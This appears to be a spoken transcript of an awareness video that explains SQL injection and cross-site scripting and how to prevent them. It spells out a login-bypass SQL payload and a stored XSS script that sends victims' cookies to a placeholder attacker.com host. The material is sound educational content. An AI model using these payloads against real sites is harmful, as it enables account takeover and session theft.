Welcome back to a new video in the series Cybersecurity Awareness Series. This video explains two critical web application vulnerabilities, SQL Injection and Cross-Site Scripting, XSS. These attacks exploit improper handling of user input and remain among the most prevalent security risks according to OWASP Top 10. We will cover how they work, realistic examples, and proven prevention methods. What is SQL injection? SQL injection occurs when an application constructs SQL queries by directly concatenating untrusted user input. This allows an attacker to alter the query's logic, potentially extracting data, modifying records, or executing administrative commands on the database. Consider this vulnerable query. It looks like this. Select asterisk from users where username equals single quote plus input plus single quote and password equals single quote plus pass plus single quote, semicolon. An attacker enters the following as the username. Single quote space or space single quote 1 equals single quote 1 space dash dash. The resulting query that actually gets executed becomes select asterisk from users where username equals single quote or single quote 1 equals single quote 1 space dash dash space single quote and password equals the semicolon. The or condition always evaluates to true. The double dash is a comment marker that tells the database to ignore everything that follows it. This completely bypasses authentication. Even more dangerous payloads can use union select to extract data from other tables or drop statements to delete entire tables. The primary and most effective defense is parameterized queries, prepared statements, which separate SQL code from data. Input is never interpreted as code. Use database-specific APIs, PDO with bindparam in PHP, prepared statement in Java, SQL.db in Go, etc. Avoid string concatenation entirely. As a secondary layer, apply least privilege to database accounts and use web application firewalls with SQLi signatures. What is cross-site scripting, XSS? Cross-site scripting, XSS, allows attackers to inject malicious scripts that execute in the context of a victim's browser. There are three main types: stored, persistent, and database, reflected via URL or form, and DOM-based client-side script modifies DOM unsafely. Successful XSS can steal session cookies, perform actions as the user, or deface content. In stored XSS, an attacker submits script document.location equals http://attacker.com/steal. Cookie equals plus document.cookie/script. The payload is stored in the database and rendered unsafely on every page view. When a victim visits, the script runs in their browser context, exfiltrating cookies or performing unauthorized actions. Reflected XSS uses crafted URLs. DOM-based occurs when client-side JavaScript unsafely uses location.search, inner HTML, etc. To prevent XSS with context-aware output encoding, HTML encode for body or text content, for example using HTML special cars. Attribute encode for HTML attributes. JavaScript encode for script blocks. Implement a strong content security policy or CSP. Header to restrict script sources, for example script src self. Modern frameworks like React and Angular provide automatic escaping. Avoid dangerous syncs like inner HTML, eval, or document that write with untrusted data. SQL injection and XSS exploit trust in user-supplied data. By using parameterized queries for SQL and proper output, encoding plus CSP for XSS, developers can effectively mitigate these risks. Regularly test applications with tools like OWASP Zap or Burp Suite, and follow OWASP cheat sheets for detailed guidance. Implementing these practices significantly strengthens web application security.